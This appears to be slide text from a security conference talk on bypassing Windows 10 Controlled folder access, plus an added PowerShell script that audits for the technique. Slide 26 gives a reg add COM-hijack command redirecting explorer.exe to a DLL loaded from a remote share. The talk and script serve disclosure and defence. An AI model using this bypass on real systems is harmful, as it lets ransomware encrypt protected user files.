The worldwide WannaCry attack of May 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a countermeasure against ransomware, Microsoft introduced the "Ransomware protection" function in the Windows 10 Fall Creators Update. How does this function work? Is it really effective? In this talk, I will explain the operating principles of "Controlled folder access", the core of "Ransomware protection", through a demonstration video. Then I will show what is required to bypass this function, and demonstrate that it can be bypassed very easily. Finally, I will ask whether we may have to reconsider the definition of a vulnerability.
2. My Profile
1992 ~ 2014
Windows software developer
2015 ~
security researcher
- 2016 AVTOKYO
- 2017 BSides Las Vegas
- 2018 GrrCON
- 2018 ToorCon
- 2018 DerbyCon
2018 ~
BSides Tokyo Organizer
- 2018 first BSides in East Asia
SOYA AOYAMA
Researcher @ Fujitsu System Integration Laboratories Ltd
Fujitsu Security Meister, High Master, Global White hacker
Organizer @ BSides Tokyo
7. TANMAY GANACHARYA
Principal Group Manager, Windows Defender Research
"Ransomware protection on Windows 10"
"For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files."
18. YAGO JESUS
"MICROSOFT ANTI RANSOMWARE BYPASS"
"By default, Office executables are included in the whitelist, so these programs can make changes in protected folders without restrictions. This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically. So a ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly to the file's owner."
26. I submitted the vulnerability report to MSRC
• Step-by-step instructions to reproduce the issue on a fresh install
  1. Put the malicious DLL on a shared file server. (\\10.0.1.40\share\Anti-ControlledFolderAccess.dll)
  2. Start cmd.exe on the target PC. (Administrator privilege is NOT required.)
  3. Execute the following commands:
       reg add HKCU\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InprocServer32 /f /ve /t REG_SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll
       taskkill /IM explorer.exe /F
       start explorer.exe
  4. Start procexp.exe on the target PC.
35. How to avoid it?
Always check whether malicious values have been written to the registry, in this case to the per-user HKCU\Software\Classes\CLSID\{...}\InprocServer32 key that redirects explorer.exe to the attacker's DLL.
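The check slide 35 asks for, written out as an added example (this is not the speaker's own code, and it is not part of the talk). It assumes a Windows 10 host with Microsoft Defender and runs as an ordinary user. The registry audit relies on a property of COM that the reg add on slide 26 exploits: when a non-elevated process activates a CLSID, per-user registrations under HKCU\Software\Classes are consulted before the machine-wide ones under HKLM\Software\Classes, so a user-writable InprocServer32 value can redirect a DLL load inside a process such as explorer.exe that Controlled folder access allows. The function names, the list of "trusted roots" and the finding texts are my own choices.

```powershell
# Added example (not from the talk): audit the two things slide 35 asks for.
# Assumes a Windows 10 host with Microsoft Defender; no administrator rights
# are needed to read HKCU or to call Get-MpPreference.

function Get-ControlledFolderAccessState {
    # Get-MpPreference exposes the Controlled folder access configuration.
    # EnableControlledFolderAccess: 0 = Disabled, 1 = Enabled (block), 2 = Audit mode.
    # Caveat: only applications an administrator added appear in AllowedApplications;
    # the programs Microsoft trusts by default (explorer.exe among them) are not listed.
    $pref = Get-MpPreference
    [pscustomobject]@{
        EnableControlledFolderAccess = $pref.EnableControlledFolderAccess
        AllowedApplications          = $pref.ControlledFolderAccessAllowedApplications
        ProtectedFolders             = $pref.ControlledFolderAccessProtectedFolders
    }
}

function Get-UserInprocServerOverrides {
    # Enumerate per-user COM registrations. HKCU\Software\Classes is consulted
    # before HKLM\Software\Classes when a non-elevated process activates a COM
    # class, so a value written here (as in the reg add on slide 26) redirects
    # a DLL load inside whatever process uses that CLSID, e.g. explorer.exe.
    param(
        # Directories where an in-process server DLL is expected to live (assumption).
        [string[]]$TrustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)})
    )
    $userClsidRoot = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $userClsidRoot)) { return }

    foreach ($key in Get-ChildItem -Path $userClsidRoot -ErrorAction SilentlyContinue) {
        $clsid  = $key.PSChildName
        $inproc = "$userClsidRoot\$clsid\InprocServer32"
        if (-not (Test-Path $inproc)) { continue }

        # The unnamed (default) value of InprocServer32 is the DLL path.
        $dll = (Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue).'(default)'
        if ([string]::IsNullOrWhiteSpace($dll)) { continue }
        $path = [Environment]::ExpandEnvironmentVariables($dll.Trim('"'))

        $reasons = New-Object System.Collections.Generic.List[string]
        $isUnc = $path.StartsWith('\\')
        if ($isUnc) { $reasons.Add('UNC path: the DLL is fetched from a remote share') }

        $underTrusted = $false
        foreach ($root in $TrustedRoots) {
            if ($root -and $path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $underTrusted = $true }
        }
        if (-not $underTrusted) { $reasons.Add('DLL is outside Windows and Program Files') }

        # A per-user entry for a CLSID that also exists machine-wide is the
        # classic COM hijack pattern: the user's DLL wins over the system one.
        if (Test-Path "HKLM:\Software\Classes\CLSID\$clsid\InprocServer32") {
            $reasons.Add('HKCU entry shadows a machine-wide class registration')
        }

        # Deliberately skip Test-Path for UNC values: probing them would contact
        # the (possibly attacker-controlled) host named in the registry.
        if (-not $isUnc -and -not (Test-Path -LiteralPath $path)) {
            $reasons.Add('referenced DLL does not exist on disk')
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                CLSID          = $clsid
                InprocServer32 = $dll
                Findings       = ($reasons -join '; ')
            }
        }
    }
}

Get-ControlledFolderAccessState | Format-List
Get-UserInprocServerOverrides | Format-Table -AutoSize
```

The registry output is a triage list, not a verdict: per-user installs (for example under %LocalAppData%) legitimately register in-process servers in HKCU and will show up under "outside Windows and Program Files", whereas a UNC path or an HKCU entry that shadows an existing HKLM class deserves immediate attention. On hosts with Sysmon, the same write can be caught as it happens by alerting on RegistryEvent (Value Set, Event ID 13) for targets matching \Software\Classes\CLSID\*\InprocServer32 in a user hive.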
36. Ransomware protection
[Diagram] Two machines, PC A and PC B, separated by a security boundary; MS17-010, which crosses that boundary, is labelled a security vulnerability. Ransomware protection draws a new boundary inside the PC around the protected folders: Documents, Pictures, Videos, Music, Desktop, Favorites.
37. We should reconsider the definition
[Diagram] The same picture with the terms refined: the boundary between PC A and PC B is a security boundary and crossing it is a security vulnerability; the Ransomware protection boundary around Documents, Pictures, Videos, Music, Desktop and Favorites is labelled a security sub boundary, and bypassing it a security sub vulnerability.